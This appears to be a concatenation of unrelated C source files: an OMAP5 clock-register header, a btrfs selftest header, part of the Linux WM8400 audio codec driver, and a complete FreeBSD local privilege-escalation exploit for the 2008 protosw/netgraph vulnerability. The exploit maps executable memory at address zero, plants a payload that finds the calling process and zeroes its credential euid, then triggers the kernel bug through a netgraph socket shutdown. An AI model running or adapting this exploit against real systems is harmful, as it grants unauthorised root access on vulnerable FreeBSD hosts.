CM_CLKMODE_DPLL_DPLL_EN_MASK 7 #define DPLL_EN_STOP 1 #define DPLL_EN_MN_BYPASS 4 #define DPLL_EN_LOW_POWER_BYPASS 5 #define DPLL_EN_FAST_RELOCK_BYPASS 6 #define DPLL_EN_LOCK 7 /* CM_IDLEST_DPLL fields */ #define ST_DPLL_CLK_MASK 1 /* SGX */ #define CLKSEL_GPU_HYD_GCLK_MASK (1 << 25) #define CLKSEL_GPU_CORE_GCLK_MASK (1 << 24) /* CM_CLKSEL_DPLL */ #define CM_CLKSEL_DPLL_DPLL_SD_DIV_SHIFT 24 #define CM_CLKSEL_DPLL_DPLL_SD_DIV_MASK (0xFF << 24) #define CM_CLKSEL_DPLL_M_SHIFT 8 #define CM_CLKSEL_DPLL_M_MASK (0x7FF << 8) #define CM_CLKSEL_DPLL_N_SHIFT 0 #define CM_CLKSEL_DPLL_N_MASK 0x7F #define CM_CLKSEL_DCC_EN_SHIFT 22 #define CM_CLKSEL_DCC_EN_MASK (1 << 22) #define OMAP4_DPLL_MAX_N 127 /* CM_SYS_CLKSEL */ #define CM_SYS_CLKSEL_SYS_CLKSEL_MASK 7 /* CM_CLKSEL_CORE */ #define CLKSEL_CORE_SHIFT 0 #define CLKSEL_L3_SHIFT 4 #define CLKSEL_L4_SHIFT 8 #define CLKSEL_CORE_X2_DIV_1 0 #define CLKSEL_L3_CORE_DIV_2 1 #define CLKSEL_L4_L3_DIV_2 1 /* CM_ABE_PLL_REF_CLKSEL */ #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_SHIFT 0 #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_MASK 1 #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_SYSCLK 0 #define CM_ABE_PLL_REF_CLKSEL_CLKSEL_32KCLK 1 /* CM_BYPCLK_DPLL_IVA */ #define CM_BYPCLK_DPLL_IVA_CLKSEL_SHIFT 0 #define CM_BYPCLK_DPLL_IVA_CLKSEL_MASK 3 #define DPLL_IVA_CLKSEL_CORE_X2_DIV_2 1 /* CM_SHADOW_FREQ_CONFIG1 */ #define SHADOW_FREQ_CONFIG1_FREQ_UPDATE_MASK 1 #define SHADOW_FREQ_CONFIG1_DLL_OVERRIDE_MASK 4 #define SHADOW_FREQ_CONFIG1_DLL_RESET_MASK 8 #define SHADOW_FREQ_CONFIG1_DPLL_EN_SHIFT 8 #define SHADOW_FREQ_CONFIG1_DPLL_EN_MASK (7 << 8) #define SHADOW_FREQ_CONFIG1_M2_DIV_SHIFT 11 #define SHADOW_FREQ_CONFIG1_M2_DIV_MASK (0x1F << 11) /*CM_<clock_domain>__CLKCTRL */ #define CD_CLKCTRL_CLKTRCTRL_SHIFT 0 #define CD_CLKCTRL_CLKTRCTRL_MASK 3 #define CD_CLKCTRL_CLKTRCTRL_NO_SLEEP 0 #define CD_CLKCTRL_CLKTRCTRL_SW_SLEEP 1 #define CD_CLKCTRL_CLKTRCTRL_SW_WKUP 2 #define CD_CLKCTRL_CLKTRCTRL_HW_AUTO 3 /* CM_<clock_domain>_<module>_CLKCTRL */ #define MODULE_CLKCTRL_MODULEMODE_SHIFT 0 #define MODULE_CLKCTRL_MODULEMODE_MASK 3 #define MODULE_CLKCTRL_IDLEST_SHIFT 16 #define MODULE_CLKCTRL_IDLEST_MASK (3 << 16) #define MODULE_CLKCTRL_MODULEMODE_SW_DISABLE 0 #define MODULE_CLKCTRL_MODULEMODE_HW_AUTO 1 #define MODULE_CLKCTRL_MODULEMODE_SW_EXPLICIT_EN 2 #define MODULE_CLKCTRL_IDLEST_FULLY_FUNCTIONAL 0 #define MODULE_CLKCTRL_IDLEST_TRANSITIONING 1 #define MODULE_CLKCTRL_IDLEST_IDLE 2 #define MODULE_CLKCTRL_IDLEST_DISABLED 3 /* CM_L4PER_GPIO4_CLKCTRL */ #define GPIO4_CLKCTRL_OPTFCLKEN_MASK (1 << 8) /* CM_L3INIT_HSMMCn_CLKCTRL */ #define HSMMC_CLKCTRL_CLKSEL_MASK (1 << 24) #define HSMMC_CLKCTRL_CLKSEL_DIV_MASK (1 << 25) /* CM_WKUP_GPTIMER1_CLKCTRL */ #define GPTIMER1_CLKCTRL_CLKSEL_MASK (1 << 24) /* CM_CAM_ISS_CLKCTRL */ #define ISS_CLKCTRL_OPTFCLKEN_MASK (1 << 8) /* CM_DSS_DSS_CLKCTRL */ #define DSS_CLKCTRL_OPTFCLKEN_MASK 0xF00 /* CM_L3INIT_USBPHY_CLKCTRL */ #define USBPHY_CLKCTRL_OPTFCLKEN_PHY_48M_MASK 8 /* CM_MPU_MPU_CLKCTRL */ #define MPU_CLKCTRL_CLKSEL_EMIF_DIV_MODE_SHIFT 24 #define MPU_CLKCTRL_CLKSEL_EMIF_DIV_MODE_MASK (1 << 24) #define MPU_CLKCTRL_CLKSEL_ABE_DIV_MODE_SHIFT 25 #define MPU_CLKCTRL_CLKSEL_ABE_DIV_MODE_MASK (1 << 25) /* CM_WKUPAON_SCRM_CLKCTRL */ #define OPTFCLKEN_SCRM_PER_SHIFT 9 #define OPTFCLKEN_SCRM_PER_MASK (1 << 9) #define OPTFCLKEN_SCRM_CORE_SHIFT 8 #define OPTFCLKEN_SCRM_CORE_MASK (1 << 8) /* Clock frequencies */ #define OMAP_SYS_CLK_FREQ_38_4_MHZ 38400000 #define OMAP_SYS_CLK_IND_38_4_MHZ 6 #define OMAP_32K_CLK_FREQ 32768 /* PRM_VC_VAL_BYPASS */ #define PRM_VC_I2C_CHANNEL_FREQ_KHZ 400 /* SMPS */ #define SMPS_I2C_SLAVE_ADDR 0x12 #define SMPS_REG_ADDR_12_MPU 0x23 #define SMPS_REG_ADDR_45_IVA 0x2B #define SMPS_REG_ADDR_8_CORE 0x37 /* PALMAS VOLTAGE SETTINGS in mv for OPP_NOMINAL */ #define VDD_MPU 1000 #define VDD_MM 1000 #define VDD_CORE 1040 #define VDD_MPU_5432 1150 #define VDD_MM_5432 1150 #define VDD_CORE_5432 1150 /* Standard offset is 0.5v expressed in uv */ #define PALMAS_SMPS_BASE_VOLT_UV 500000 /* TPS */ #define TPS62361_I2C_SLAVE_ADDR 0x60 #define TPS62361_REG_ADDR_SET0 0x0 #define TPS62361_REG_ADDR_SET1 0x1 #define TPS62361_REG_ADDR_SET2 0x2 #define TPS62361_REG_ADDR_SET3 0x3 #define TPS62361_REG_ADDR_CTRL 0x4 #define TPS62361_REG_ADDR_TEMP 0x5 #define TPS62361_REG_ADDR_RMP_CTRL 0x6 #define TPS62361_REG_ADDR_CHIP_ID 0x8 #define TPS62361_REG_ADDR_CHIP_ID_2 0x9 #define TPS62361_BASE_VOLT_MV 500 #define TPS62361_VSEL0_GPIO 7 /* Defines for DPLL setup */ #define DPLL_LOCKED_FREQ_TOLERANCE_0 0 #define DPLL_LOCKED_FREQ_TOLERANCE_500_KHZ 500 #define DPLL_LOCKED_FREQ_TOLERANCE_1_MHZ 1000 #define DPLL_NO_LOCK 0 #define DPLL_LOCK 1 #define NUM_SYS_CLKS 7 struct dpll_regs { u32 cm_clkmode_dpll; u32 cm_idlest_dpll; u32 cm_autoidle_dpll; u32 cm_clksel_dpll; u32 cm_div_m2_dpll; u32 cm_div_m3_dpll; u32 cm_div_h11_dpll; u32 cm_div_h12_dpll; u32 cm_div_h13_dpll; u32 cm_div_h14_dpll; u32 reserved[3]; u32 cm_div_h22_dpll; u32 cm_div_h23_dpll; }; /* DPLL parameter table */ struct dpll_params { u32 m; u32 n; s8 m2; s8 m3; s8 h11; s8 h12; s8 h13; s8 h14; s8 h22; s8 h23; }; extern struct omap5_prcm_regs *const prcm; extern const u32 sys_clk_array[8]; void scale_vcores(void); void do_scale_tps62361(int gpio, u32 reg, u32 volt_mv); u32 get_offset_code(u32 offset); u32 omap_ddr_clk(void); void do_scale_vcore(u32 vcore_reg, u32 volt_mv); void setup_post_dividers(u32 *const base, const struct dpll_params *params); u32 get_sys_clk_index(void); void enable_basic_clocks(void); void enable_non_essential_clocks(void); void enable_basic_uboot_clocks(void); void do_enable_clocks(u32 *const *clk_domains, u32 *const *clk_modules_hw_auto, u32 *const *clk_modules_explicit_en, u8 wait_for_enable); const struct dpll_params *get_mpu_dpll_params(void); const struct dpll_params *get_core_dpll_params(void); const struct dpll_params *get_per_dpll_params(void); const struct dpll_params *get_iva_dpll_params(void); const struct dpll_params *get_usb_dpll_params(void); const struct dpll_params *get_abe_dpll_params(void); #endif /* _CLOCKS_OMAP5_H_ */
{ "language": "C" }
/* * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability * defined here: * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc * * This will overwrite your credential structure in the kernel. This will * affect more than just the exploit's process, which is why this doesn't * spawn a shell. When the exploit has finished, your login shell should * have euid=0. * * Enjoy, and happy holidays! * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 */ #include <sys/mman.h> #include <sys/time.h> #include <sys/stat.h> #include <sys/proc.h> #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #include <netgraph/ng_socket.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #define PAGES 1 #define PATTERN1 0x8f8f8f8f #define PATTERN2 0x6e6e6e6e typedef unsigned long ulong; typedef unsigned char uchar; int x(void) { struct proc * p = (struct proc * )PATTERN1; uint * i; while(1) { if(p->p_pid == PATTERN2) { i = (uint * )p->p_ucred; *++i = 0; break; } p = p->p_list.le_next; } return 1; } int main(int argc, char * argv[]) { ulong addr; uchar * c; uchar * d; uint * i; void * v; int pid; int s; if(argc != 2) { fprintf(stderr, "usage: ./x <allproc>\n"); return 1; } addr = strtoul(argv[1], 0, 0); v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0); if(v == MAP_FAILED) { perror("mmap"); return 0; } c = v; d = (uchar * )x; while(1) { *c = *d; if(*d == 0xc3) { break; } d++; c++; } *c++ = 0xc3; c = v; while(1) { if(*(long * )c == PATTERN1) { *(c + 0) = addr >> 0; *(c + 1) = addr >> 8; *(c + 2) = addr >> 16; *(c + 3) = addr >> 24; break; } c++; } pid = getpid(); while(1) { if(*(long * )c == PATTERN2) { *(c + 0) = pid >> 0; *(c + 1) = pid >> 8; *(c + 2) = pid >> 16; *(c + 3) = pid >> 24; break; } c++; } s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if(s < 0) { perror("socket"); return 1; } shutdown(s, SHUT_RDWR); return 0; } // milw0rm.com [2008-12-28]
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright (C) 2013 Fusion IO. All rights reserved. */ #ifndef BTRFS_TESTS_H #define BTRFS_TESTS_H #ifdef CONFIG_BTRFS_FS_RUN_SANITY_TESTS int btrfs_run_sanity_tests(void); #define test_msg(fmt, ...) pr_info("BTRFS: selftest: " fmt "\n", ##__VA_ARGS__) #define test_err(fmt, ...) pr_err("BTRFS: selftest: %s:%d " fmt "\n", \ __FILE__, __LINE__, ##__VA_ARGS__) #define test_std_err(index) test_err("%s", test_error[index]) enum { TEST_ALLOC_FS_INFO, TEST_ALLOC_ROOT, TEST_ALLOC_EXTENT_BUFFER, TEST_ALLOC_PATH, TEST_ALLOC_INODE, TEST_ALLOC_BLOCK_GROUP, TEST_ALLOC_EXTENT_MAP, }; extern const char *test_error[]; struct btrfs_root; struct btrfs_trans_handle; int btrfs_test_extent_buffer_operations(u32 sectorsize, u32 nodesize); int btrfs_test_free_space_cache(u32 sectorsize, u32 nodesize); int btrfs_test_extent_io(u32 sectorsize, u32 nodesize); int btrfs_test_inodes(u32 sectorsize, u32 nodesize); int btrfs_test_qgroups(u32 sectorsize, u32 nodesize); int btrfs_test_free_space_tree(u32 sectorsize, u32 nodesize); int btrfs_test_extent_map(void); struct inode *btrfs_new_test_inode(void); struct btrfs_fs_info *btrfs_alloc_dummy_fs_info(u32 nodesize, u32 sectorsize); void btrfs_free_dummy_fs_info(struct btrfs_fs_info *fs_info); void btrfs_free_dummy_root(struct btrfs_root *root); struct btrfs_block_group * btrfs_alloc_dummy_block_group(struct btrfs_fs_info *fs_info, unsigned long length); void btrfs_free_dummy_block_group(struct btrfs_block_group *cache); void btrfs_init_dummy_trans(struct btrfs_trans_handle *trans, struct btrfs_fs_info *fs_info); struct btrfs_device *btrfs_alloc_dummy_device(struct btrfs_fs_info *fs_info); #else static inline int btrfs_run_sanity_tests(void) { return 0; } #endif #endif
{ "language": "C" }
/* * wm8400.c -- WM8400 ALSA Soc Audio driver * * Copyright 2008-11 Wolfson Microelectronics PLC. * Author: Mark Brown <broonie@opensource.wolfsonmicro.com> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * */ #include <linux/module.h> #include <linux/moduleparam.h> #include <linux/kernel.h> #include <linux/slab.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/pm.h> #include <linux/platform_device.h> #include <linux/regulator/consumer.h> #include <linux/mfd/wm8400-audio.h> #include <linux/mfd/wm8400-private.h> #include <linux/mfd/core.h> #include <sound/core.h> #include <sound/pcm.h> #include <sound/pcm_params.h> #include <sound/soc.h> #include <sound/initval.h> #include <sound/tlv.h> #include "wm8400.h" static struct regulator_bulk_data power[] = { { .supply = "I2S1VDD", }, { .supply = "I2S2VDD", }, { .supply = "DCVDD", }, { .supply = "AVDD", }, { .supply = "FLLVDD", }, { .supply = "HPVDD", }, { .supply = "SPKVDD", }, }; /* codec private data */ struct wm8400_priv { struct snd_soc_codec *codec; struct wm8400 *wm8400; u16 fake_register; unsigned int sysclk; unsigned int pcmclk; struct work_struct work; int fll_in, fll_out; }; static void wm8400_codec_reset(struct snd_soc_codec *codec) { struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); wm8400_reset_codec_reg_cache(wm8400->wm8400); } static const DECLARE_TLV_DB_SCALE(rec_mix_tlv, -1500, 600, 0); static const DECLARE_TLV_DB_SCALE(in_pga_tlv, -1650, 3000, 0); static const DECLARE_TLV_DB_SCALE(out_mix_tlv, -2100, 0, 0); static const DECLARE_TLV_DB_SCALE(out_pga_tlv, -7300, 600, 0); static const DECLARE_TLV_DB_SCALE(out_omix_tlv, -600, 0, 0); static const DECLARE_TLV_DB_SCALE(out_dac_tlv, -7163, 0, 0); static const DECLARE_TLV_DB_SCALE(in_adc_tlv, -7163, 1763, 0); static const DECLARE_TLV_DB_SCALE(out_sidetone_tlv, -3600, 0, 0); static int wm8400_outpga_put_volsw_vu(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct snd_soc_codec *codec = snd_soc_kcontrol_codec(kcontrol); struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; int reg = mc->reg; int ret; u16 val; ret = snd_soc_put_volsw(kcontrol, ucontrol); if (ret < 0) return ret; /* now hit the volume update bits (always bit 8) */ val = snd_soc_read(codec, reg); return snd_soc_write(codec, reg, val | 0x0100); } #define WM8400_OUTPGA_SINGLE_R_TLV(xname, reg, shift, max, invert, tlv_array) \ SOC_SINGLE_EXT_TLV(xname, reg, shift, max, invert, \ snd_soc_get_volsw, wm8400_outpga_put_volsw_vu, tlv_array) static const char *wm8400_digital_sidetone[] = {"None", "Left ADC", "Right ADC", "Reserved"}; static SOC_ENUM_SINGLE_DECL(wm8400_left_digital_sidetone_enum, WM8400_DIGITAL_SIDE_TONE, WM8400_ADC_TO_DACL_SHIFT, wm8400_digital_sidetone); static SOC_ENUM_SINGLE_DECL(wm8400_right_digital_sidetone_enum, WM8400_DIGITAL_SIDE_TONE, WM8400_ADC_TO_DACR_SHIFT, wm8400_digital_sidetone); static const char *wm8400_adcmode[] = {"Hi-fi mode", "Voice mode 1", "Voice mode 2", "Voice mode 3"}; static SOC_ENUM_SINGLE_DECL(wm8400_right_adcmode_enum, WM8400_ADC_CTRL, WM8400_ADC_HPF_CUT_SHIFT, wm8400_adcmode); static const struct snd_kcontrol_new wm8400_snd_controls[] = { /* INMIXL */ SOC_SINGLE("LIN12 PGA Boost", WM8400_INPUT_MIXER3, WM8400_L12MNBST_SHIFT, 1, 0), SOC_SINGLE("LIN34 PGA Boost", WM8400_INPUT_MIXER3, WM8400_L34MNBST_SHIFT, 1, 0), /* INMIXR */ SOC_SINGLE("RIN12 PGA Boost", WM8400_INPUT_MIXER3, WM8400_R12MNBST_SHIFT, 1, 0), SOC_SINGLE("RIN34 PGA Boost", WM8400_INPUT_MIXER3, WM8400_R34MNBST_SHIFT, 1, 0), /* LOMIX */ SOC_SINGLE_TLV("LOMIX LIN3 Bypass Volume", WM8400_OUTPUT_MIXER3, WM8400_LLI3LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX RIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER3, WM8400_LR12LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX LIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER3, WM8400_LL12LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX RIN3 Bypass Volume", WM8400_OUTPUT_MIXER5, WM8400_LRI3LOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX AINRMUX Bypass Volume", WM8400_OUTPUT_MIXER5, WM8400_LRBLOVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("LOMIX AINLMUX Bypass Volume", WM8400_OUTPUT_MIXER5, WM8400_LRBLOVOL_SHIFT, 7, 0, out_mix_tlv), /* ROMIX */ SOC_SINGLE_TLV("ROMIX RIN3 Bypass Volume", WM8400_OUTPUT_MIXER4, WM8400_RRI3ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX LIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER4, WM8400_RL12ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX RIN12 PGA Bypass Volume", WM8400_OUTPUT_MIXER4, WM8400_RR12ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX LIN3 Bypass Volume", WM8400_OUTPUT_MIXER6, WM8400_RLI3ROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX AINLMUX Bypass Volume", WM8400_OUTPUT_MIXER6, WM8400_RLBROVOL_SHIFT, 7, 0, out_mix_tlv), SOC_SINGLE_TLV("ROMIX AINRMUX Bypass Volume", WM8400_OUTPUT_MIXER6, WM8400_RRBROVOL_SHIFT, 7, 0, out_mix_tlv), /* LOUT */ WM8400_OUTPGA_SINGLE_R_TLV("LOUT Volume", WM8400_LEFT_OUTPUT_VOLUME, WM8400_LOUTVOL_SHIFT, WM8400_LOUTVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("LOUT ZC", WM8400_LEFT_OUTPUT_VOLUME, WM8400_LOZC_SHIFT, 1, 0), /* ROUT */ WM8400_OUTPGA_SINGLE_R_TLV("ROUT Volume", WM8400_RIGHT_OUTPUT_VOLUME, WM8400_ROUTVOL_SHIFT, WM8400_ROUTVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("ROUT ZC", WM8400_RIGHT_OUTPUT_VOLUME, WM8400_ROZC_SHIFT, 1, 0), /* LOPGA */ WM8400_OUTPGA_SINGLE_R_TLV("LOPGA Volume", WM8400_LEFT_OPGA_VOLUME, WM8400_LOPGAVOL_SHIFT, WM8400_LOPGAVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("LOPGA ZC Switch", WM8400_LEFT_OPGA_VOLUME, WM8400_LOPGAZC_SHIFT, 1, 0), /* ROPGA */ WM8400_OUTPGA_SINGLE_R_TLV("ROPGA Volume", WM8400_RIGHT_OPGA_VOLUME, WM8400_ROPGAVOL_SHIFT, WM8400_ROPGAVOL_MASK, 0, out_pga_tlv), SOC_SINGLE("ROPGA ZC Switch", WM8400_RIGHT_OPGA_VOLUME, WM8400_ROPGAZC_SHIFT, 1, 0), SOC_SINGLE("LON Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_LONMUTE_SHIFT, 1, 0), SOC_SINGLE("LOP Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_LOPMUTE_SHIFT, 1, 0), SOC_SINGLE("LOP Attenuation Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_LOATTN_SHIFT, 1, 0), SOC_SINGLE("RON Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_RONMUTE_SHIFT, 1, 0), SOC_SINGLE("ROP Mute Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_ROPMUTE_SHIFT, 1, 0), SOC_SINGLE("ROP Attenuation Switch", WM8400_LINE_OUTPUTS_VOLUME, WM8400_ROATTN_SHIFT, 1, 0), SOC_SINGLE("OUT3 Mute Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT3MUTE_SHIFT, 1, 0), SOC_SINGLE("OUT3 Attenuation Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT3ATTN_SHIFT, 1, 0), SOC_SINGLE("OUT4 Mute Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT4MUTE_SHIFT, 1, 0), SOC_SINGLE("OUT4 Attenuation Switch", WM8400_OUT3_4_VOLUME, WM8400_OUT4ATTN_SHIFT, 1, 0), SOC_SINGLE("Speaker Mode Switch", WM8400_CLASSD1, WM8400_CDMODE_SHIFT, 1, 0), SOC_SINGLE("Speaker Output Attenuation Volume", WM8400_SPEAKER_VOLUME, WM8400_SPKATTN_SHIFT, WM8400_SPKATTN_MASK, 0), SOC_SINGLE("Speaker DC Boost Volume", WM8400_CLASSD3, WM8400_DCGAIN_SHIFT, 6, 0), SOC_SINGLE("Speaker AC Boost Volume", WM8400_CLASSD3, WM8400_ACGAIN_SHIFT, 6, 0), WM8400_OUTPGA_SINGLE_R_TLV("Left DAC Digital Volume", WM8400_LEFT_DAC_DIGITAL_VOLUME, WM8400_DACL_VOL_SHIFT, 127, 0, out_dac_tlv), WM8400_OUTPGA_SINGLE_R_TLV("Right DAC Digital Volume", WM8400_RIGHT_DAC_DIGITAL_VOLUME, WM8400_DACR_VOL_SHIFT, 127, 0, out_dac_tlv), SOC_ENUM("Left Digital Sidetone", wm8400_left_digital_sidetone_enum), SOC_ENUM("Right Digital Sidetone", wm8400_right_digital_sidetone_enum), SOC_SINGLE_TLV("Left Digital Sidetone Volume", WM8400_DIGITAL_SIDE_TONE, WM8400_ADCL_DAC_SVOL_SHIFT, 15, 0, out_sidetone_tlv), SOC_SINGLE_TLV("Right Digital Sidetone Volume", WM8400_DIGITAL_SIDE_TONE, WM8400_ADCR_DAC_SVOL_SHIFT, 15, 0, out_sidetone_tlv), SOC_SINGLE("ADC Digital High Pass Filter Switch", WM8400_ADC_CTRL, WM8400_ADC_HPF_ENA_SHIFT, 1, 0), SOC_ENUM("ADC HPF Mode", wm8400_right_adcmode_enum), WM8400_OUTPGA_SINGLE_R_TLV("Left ADC Digital Volume", WM8400_LEFT_ADC_DIGITAL_VOLUME, WM8400_ADCL_VOL_SHIFT, WM8400_ADCL_VOL_MASK, 0, in_adc_tlv), WM8400_OUTPGA_SINGLE_R_TLV("Right ADC Digital Volume", WM8400_RIGHT_ADC_DIGITAL_VOLUME, WM8400_ADCR_VOL_SHIFT, WM8400_ADCR_VOL_MASK, 0, in_adc_tlv), WM8400_OUTPGA_SINGLE_R_TLV("LIN12 Volume", WM8400_LEFT_LINE_INPUT_1_2_VOLUME, WM8400_LIN12VOL_SHIFT, WM8400_LIN12VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("LIN12 ZC Switch", WM8400_LEFT_LINE_INPUT_1_2_VOLUME, WM8400_LI12ZC_SHIFT, 1, 0), SOC_SINGLE("LIN12 Mute Switch", WM8400_LEFT_LINE_INPUT_1_2_VOLUME, WM8400_LI12MUTE_SHIFT, 1, 0), WM8400_OUTPGA_SINGLE_R_TLV("LIN34 Volume", WM8400_LEFT_LINE_INPUT_3_4_VOLUME, WM8400_LIN34VOL_SHIFT, WM8400_LIN34VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("LIN34 ZC Switch", WM8400_LEFT_LINE_INPUT_3_4_VOLUME, WM8400_LI34ZC_SHIFT, 1, 0), SOC_SINGLE("LIN34 Mute Switch", WM8400_LEFT_LINE_INPUT_3_4_VOLUME, WM8400_LI34MUTE_SHIFT, 1, 0), WM8400_OUTPGA_SINGLE_R_TLV("RIN12 Volume", WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, WM8400_RIN12VOL_SHIFT, WM8400_RIN12VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("RIN12 ZC Switch", WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, WM8400_RI12ZC_SHIFT, 1, 0), SOC_SINGLE("RIN12 Mute Switch", WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, WM8400_RI12MUTE_SHIFT, 1, 0), WM8400_OUTPGA_SINGLE_R_TLV("RIN34 Volume", WM8400_RIGHT_LINE_INPUT_3_4_VOLUME, WM8400_RIN34VOL_SHIFT, WM8400_RIN34VOL_MASK, 0, in_pga_tlv), SOC_SINGLE("RIN34 ZC Switch", WM8400_RIGHT_LINE_INPUT_3_4_VOLUME, WM8400_RI34ZC_SHIFT, 1, 0), SOC_SINGLE("RIN34 Mute Switch", WM8400_RIGHT_LINE_INPUT_3_4_VOLUME, WM8400_RI34MUTE_SHIFT, 1, 0), }; /* * _DAPM_ Controls */ static int outmixer_event (struct snd_soc_dapm_widget *w, struct snd_kcontrol * kcontrol, int event) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; u32 reg_shift = mc->shift; int ret = 0; u16 reg; switch (reg_shift) { case WM8400_SPEAKER_MIXER | (WM8400_LDSPK << 8) : reg = snd_soc_read(w->codec, WM8400_OUTPUT_MIXER1); if (reg & WM8400_LDLO) { printk(KERN_WARNING "Cannot set as Output Mixer 1 LDLO Set\n"); ret = -1; } break; case WM8400_SPEAKER_MIXER | (WM8400_RDSPK << 8): reg = snd_soc_read(w->codec, WM8400_OUTPUT_MIXER2); if (reg & WM8400_RDRO) { printk(KERN_WARNING "Cannot set as Output Mixer 2 RDRO Set\n"); ret = -1; } break; case WM8400_OUTPUT_MIXER1 | (WM8400_LDLO << 8): reg = snd_soc_read(w->codec, WM8400_SPEAKER_MIXER); if (reg & WM8400_LDSPK) { printk(KERN_WARNING "Cannot set as Speaker Mixer LDSPK Set\n"); ret = -1; } break; case WM8400_OUTPUT_MIXER2 | (WM8400_RDRO << 8): reg = snd_soc_read(w->codec, WM8400_SPEAKER_MIXER); if (reg & WM8400_RDSPK) { printk(KERN_WARNING "Cannot set as Speaker Mixer RDSPK Set\n"); ret = -1; } break; } return ret; } /* INMIX dB values */ static const unsigned int in_mix_tlv[] = { TLV_DB_RANGE_HEAD(1), 0,7, TLV_DB_SCALE_ITEM(-1200, 600, 0), }; /* Left In PGA Connections */ static const struct snd_kcontrol_new wm8400_dapm_lin12_pga_controls[] = { SOC_DAPM_SINGLE("LIN1 Switch", WM8400_INPUT_MIXER2, WM8400_LMN1_SHIFT, 1, 0), SOC_DAPM_SINGLE("LIN2 Switch", WM8400_INPUT_MIXER2, WM8400_LMP2_SHIFT, 1, 0), }; static const struct snd_kcontrol_new wm8400_dapm_lin34_pga_controls[] = { SOC_DAPM_SINGLE("LIN3 Switch", WM8400_INPUT_MIXER2, WM8400_LMN3_SHIFT, 1, 0), SOC_DAPM_SINGLE("LIN4 Switch", WM8400_INPUT_MIXER2, WM8400_LMP4_SHIFT, 1, 0), }; /* Right In PGA Connections */ static const struct snd_kcontrol_new wm8400_dapm_rin12_pga_controls[] = { SOC_DAPM_SINGLE("RIN1 Switch", WM8400_INPUT_MIXER2, WM8400_RMN1_SHIFT, 1, 0), SOC_DAPM_SINGLE("RIN2 Switch", WM8400_INPUT_MIXER2, WM8400_RMP2_SHIFT, 1, 0), }; static const struct snd_kcontrol_new wm8400_dapm_rin34_pga_controls[] = { SOC_DAPM_SINGLE("RIN3 Switch", WM8400_INPUT_MIXER2, WM8400_RMN3_SHIFT, 1, 0), SOC_DAPM_SINGLE("RIN4 Switch", WM8400_INPUT_MIXER2, WM8400_RMP4_SHIFT, 1, 0), }; /* INMIXL */ static const struct snd_kcontrol_new wm8400_dapm_inmixl_controls[] = { SOC_DAPM_SINGLE_TLV("Record Left Volume", WM8400_INPUT_MIXER3, WM8400_LDBVOL_SHIFT, WM8400_LDBVOL_MASK, 0, in_mix_tlv), SOC_DAPM_SINGLE_TLV("LIN2 Volume", WM8400_INPUT_MIXER5, WM8400_LI2BVOL_SHIFT, 7, 0, in_mix_tlv), SOC_DAPM_SINGLE("LINPGA12 Switch", WM8400_INPUT_MIXER3, WM8400_L12MNB_SHIFT, 1, 0), SOC_DAPM_SINGLE("LINPGA34 Switch", WM8400_INPUT_MIXER3, WM8400_L34MNB_SHIFT, 1, 0), }; /* INMIXR */ static const struct snd_kcontrol_new wm8400_dapm_inmixr_controls[] = { SOC_DAPM_SINGLE_TLV("Record Right Volume", WM8400_INPUT_MIXER4, WM8400_RDBVOL_SHIFT, WM8400_RDBVOL_MASK, 0, in_mix_tlv), SOC_DAPM_SINGLE_TLV("RIN2 Volume", WM8400_INPUT_MIXER6, WM8400_RI2BVOL_SHIFT, 7, 0, in_mix_tlv), SOC_DAPM_SINGLE("RINPGA12 Switch", WM8400_INPUT_MIXER3, WM8400_L12MNB_SHIFT, 1, 0), SOC_DAPM_SINGLE("RINPGA34 Switch", WM8400_INPUT_MIXER3, WM8400_L34MNB_SHIFT, 1, 0), }; /* 